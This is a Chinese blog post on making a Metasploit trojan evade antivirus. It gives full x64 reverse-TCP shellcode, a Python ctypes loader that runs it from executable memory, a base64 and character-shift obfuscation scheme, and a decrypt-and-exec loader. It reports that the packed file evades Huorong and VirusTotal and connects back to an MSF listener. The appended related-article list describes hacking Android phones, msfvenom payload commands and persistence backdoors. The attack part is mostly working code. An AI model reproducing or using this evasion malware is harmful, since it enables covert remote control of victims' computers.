简单的Msf木马免杀

最新推荐文章于 2024-05-29 22:21:42 发布
最新推荐文章于 2024-05-29 22:21:42 发布
阅读量1.1k 收藏 9
点赞数 2
文章标签: python pycharm 安全 网络安全 密码学
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47948655/article/details/132244750
版权

木马免杀

1、在kali中生成shellcode64位木马

在这里插入图片描述
在这里插入图片描述

2、将shellcode拷贝到pycharm中,并把加载器和shellcode写在一个文件中

import ctypes

buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
buf += b"\x41\x50\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52"
buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x4d\x31\xc9"
buf += b"\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x48\x31\xc0"
buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
buf += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
buf += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
buf += b"\x8b\x34\x88\x4d\x31\xc9\x48\x01\xd6\x48\x31\xc0"
buf += b"\x41\xc1\xc9\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1"
buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58"
buf += b"\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
buf += b"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x7e\x82\x41\x54"
buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
buf += b"\xf0\xb5\xa2\x56\xff\xd5"

ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

3、对shellcode和加载器进行加密

import base64


buf = b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
buf += b"\x41\x50\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52"
buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x4d\x31\xc9"
buf += b"\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x48\x31\xc0"
buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
buf += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
buf += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
buf += b"\x8b\x34\x88\x4d\x31\xc9\x48\x01\xd6\x48\x31\xc0"
buf += b"\x41\xc1\xc9\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1"
buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58"
buf += b"\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
buf += b"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x7e\x82\x41\x54"
buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
buf += b"\xf0\xb5\xa2\x56\xff\xd5"

result = base64.b64encode(buf)
new_buf = result.decode()
# print(new_buf)
result = ""
for i in new_buf:
    result += chr(ord(i) + 3)
result2 = result.encode('utf-8')
encoded = base64.b64encode(result2)
#print(encoded)

# /EiD5PDozAAAAEFRQVBSSDHSUVZlSItSYEiLUhhIi1IgTTHJSA+3SkpIi3JQSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSITTHJSAHWSDHAQcHJDaxBAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEFYSAHQQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCABFcwKh+gkFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V

code = 'ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64;rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40);ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf));handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0);ctypes.windll.kernel32.WaitForSingleObject(handle, -1)'
reverse = code[::-1]
b64 = base64.b64encode(reverse.encode())
print(b64)

4、对shellcode和加载器进行解密

import base64,ctypes

# shellcode加密
resource = b'MkhsRzhTR3J9REREREhJVVRZRVZWR0tWWFldb1ZMd1ZcSGxPWGtrTGw0TGpXV0tNVkQuNlZuc0xsNk1UVkdLRHVHe2tpREx2TEhLRXxUNEVEZktsOllNRVhYbE9YbEZPVG17TERnRXBqW2pcRnpMU2tbTEREREZPakxqRERERUxrZkUzXTNqRTNJRk9WRWtIbDNEalZUS1Q3NF1MMjtvRWx9VkxXV0tNVkRLWlZHS0RUZktNR2R7RURmSDc3S1t7V0RRUE1Ea0lSZ0k0NUlrSGwzRG5WVEtUXW5KT0dIa0hsM0RmVlRLVFRcdkhsSElcVkRLVFRZa2haWXNFWkhJXVRZc0xqLnpqVFlPMjdJa0VaWXNMbHtPc1YyMjIyNDRNeXFnfVBvO31QakREVFldTWxoXUxqaHxqRFRERFZccW9WZXpGREVJZnpOay5qbklYVlxxbldMcXtUZXNQZ3xcSzI8WVBsaHNyRFRIRERJb0V4bHBEZHpHMjRack5UWThUWEgze3xYM3t6SG0yekhsTXpubTJ6SGxNelhKOTlqMmk3UzJZVkxxS2RrRUVaSHxNN25sTS5YSjlwZFkzXGkyWWtmRTNGbnEyfXFbbzlNUEREREVMai56VFZMcWxXV0tNZGpVRVpIbE0uWEo5RHdxTFsyMllqMmpEaW9ZTGo7VGpbcnE1ZG5FRVpaakRIREREVFlrTGxpTUxQZm9FeG9sblguWzI0WGxNejNwTXszM3t8WHBNO0hsTTVubE0uWEo5RHdxTFsyMllqMmpEaVZrXFRZZ11kREVERERFRVpKckRabko5Rnw7U1BTMllZNG9FeHFZeFdaSzI0WHEyfXhuOzIyMjJWREtHVkZxSlZMWzVnZVVFMi5nXGRqRV1WZmlGO09abFl5Mlk='

result = ""
decoded = base64.b64decode(resource)
result2 = decoded.decode('utf-8')
for i in result2:
    result += chr(ord(i) - 3)
# print(result)
buf = base64.b64decode(result)
#print(buf)

# 加载器解密

b64 = b'KTEtICxlbGRuYWgodGNlamJPZWxnbmlTcm9GdGlhVy4yM2xlbnJlay5sbGRuaXcuc2VweXRjOykwICwwICwwICwpZWdhcHh3cig0NnRuaXVfYy5zZXB5dGMgLDAgLDAoZGFlcmhUZXRhZXJDLjIzbGVucmVrLmxsZG5pdy5zZXB5dGMgPSBlbGRuYWg7KSlmdWIobmVsICwpZnViKHJlZmZ1Yl9nbmlydHNfZXRhZXJjLnNlcHl0YyAsKWVnYXB4d3IoNDZ0bml1X2Muc2VweXRjKHlyb21lTWV2b01sdFIuMjNsZW5yZWsubGxkbml3LnNlcHl0YzspMDR4MCAsMDAwM3gwICwpZnViKG5lbCAsMChjb2xsQWxhdXRyaVYuMjNsZW5yZWsubGxkbml3LnNlcHl0YyA9IGVnYXB4d3I7NDZ0bml1X2Muc2VweXRjPWVweXRzZXIuY29sbEFsYXV0cmlWLjIzbGVucmVrLmxsZG5pdy5zZXB5dGM='
code =base64.b64decode(b64)[::-1]
exec (code)

5、对解密后的python文件进行打包

在这里插入图片描述

6、使用火绒进行查杀发现成功免杀

在这里插入图片描述

7、微步云沙箱和VirusTotal检测结果
在这里插入图片描述
在这里插入图片描述

8、msf监听成功上线

在这里插入图片描述

LoRayChing
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
m0_74914256的博客
05-05 1万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
通过Python实现Payload分离过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
Kali渗透-MSF木马技术
小司机的奥拓
12-25 1893
道高一尺,魔高一丈。毒软件的更新是非常快的,这里给出的方法和过程在今天还是可行的。但过了几个月之后,技术就有可能出现重大的变化和更新。技术需要不断地磨练与实践,才能在实战中提高成功率。
msf生成木马
qq_56426046的博客
09-08 5513
1.修改特征码的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到的效果事实上包含着两种方式。一种是改特征码,这也是的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
kali制作木马并使用shellter工具来实现更低的查
最新发布
勤能补拙
05-29 850
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避毒软件的查。俗称为
msf木马生成
qq_66985187的博客
07-04 2321
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了毒软件的查。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msfmsfvenom)命令实现的操作。由于技术的涉猎面非常广,其中包含反。简称"",它指的是一种能使病毒木马于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
msf编码
m0_61506558的博客
09-03 2513
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
初学MSF之渗透、提权、(上)
qq_53058639的博客
08-01 1812
Metasploit是一个费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
MSF实战过静态:ShellCode加花指令
xf555er的博客
03-30 1163
第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令。
利用msfvenom制作windows木马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
msf使用方法
06-29
- `sessions -k <ID>`死指定ID的会话。 #### 控制台操作 - `<Ctrl>z`将控制权交还给系统shell。 - `<Ctrl>c`中断正在运行的操作。 #### 管理后台任务 - `jobs`列出所有后台任务。 - `jobs -K`终止所有后台任务...
捆绑机无后门无木马
11-22
在IT行业中,"捆绑机无后门无木马"是一个相对敏感的话题,因为这涉及到软件的安全性和合法性。捆绑机通常是指一种工具,能够将多个程序或恶意代码捆绑在一起,形成一个复合软件包,用户在下载安装时可能并未察觉...
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒和360
07-16
1. **Shellter工具**:Shellter是一个能够将木马嵌入到正常软件中的工具,通过这种方式,可以有效地避开毒软件的检测,实现加壳。它支持将恶意代码注入到32位的可执行文件中,以隐藏木马的行为。 2. **Kali ...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
方法(三)msf加载器
qq_56426046的博客
10-03 1035
编辑i686-w64-mingw32-gcc main.c -o mm.exe-lws2_32。Metasploit还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混。metasploit是一款开源的安全漏洞检测工具,同时Metasploit是费的工具,Framework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试。在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且。
MSF木马(三)
谢公子的博客
05-26 9063
目录 MSF木马 MSF木马 MSF下输入,生成shellcode msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=x.x.x.x LPORT=8888 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > shellcode.c 这
[学习]MSF网络查与规避
qq_42585535的博客
08-06 549
终于摸到一点的门了,前面学那么多win api编程都是在打基础前排提醒:这篇文章不会讲什么理论的东西,因为本人也刚接触,基本没有什么知识,所以只是把当前学到的东西复现一遍。
Android 教程
zkaqlaoniao的博客
10-11 3136
练习两年半VT检测 https://www.virustotal.com/gui/home/upload。
使用msfvenom火绒
2301_76718200的博客
11-11 858
本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win。2、再使用msfvenom生成一个捆绑可以被windows执行的exe木马文件。3、把刚刚生成的exe木马文件传输到我们的win11物理机上。1、首先到火绒官网上下载个火绒安装包后放到kali中。#修改成我们之前生成木马时使用的payload。前提把软关闭要不然会掉,没有做木马。靶机,启动火绒点击我们编译过的木马程序。点击后就连接上我们的kali攻击机了。#设置kali的IP地址为监听地址。
msf木马生成后怎么永久
06-06
在Metasploit Framework (MSF)中生成的木马默认情况下不是永久性的,它只是在目标机器上运行一次。如果您想让生成的木马在目标机器上保持永久性,您需要将其绑定到一个持久化机制上,例如Windows系统中的计划任务或服务。 以下是一个示例,演示如何使用Metasploit Framework (MSF)生成一个永久性后门,该后门将在Windows系统中的计划任务中运行: 1. 在MSF中,生成一个木马,例如Windows反向TCP后门: ``` use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [您的IP地址] set LPORT [监听端口号] run ``` 2. 在目标机器上,使用Meterpreter会话执行以下命令,将生成的后门绑定到Windows计划任务中: ``` run persistence -U -i 30 -p [监听端口号] -r [您的IP地址] ``` 其中,“-U”表示使用用户级别的持久性,即只有当前用户登录时才会运行后门;“-i 30”表示每隔30秒就会检查后门是否运行,如果没有运行,则会自动启动;“-p”和“-r”选项分别指定监听端口和您的IP地址。 3. 等待目标机器执行计划任务,后门将在后台运行,并且每隔30秒检查一次是否运行。 请注意,将生成的后门绑定到一个持久化机制上可能会被毒软件或安全软件检测到,并且可能会被视为恶意软件。因此,使用此方法时请务必谨慎,并仅在合法授权的测试环境中使用。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值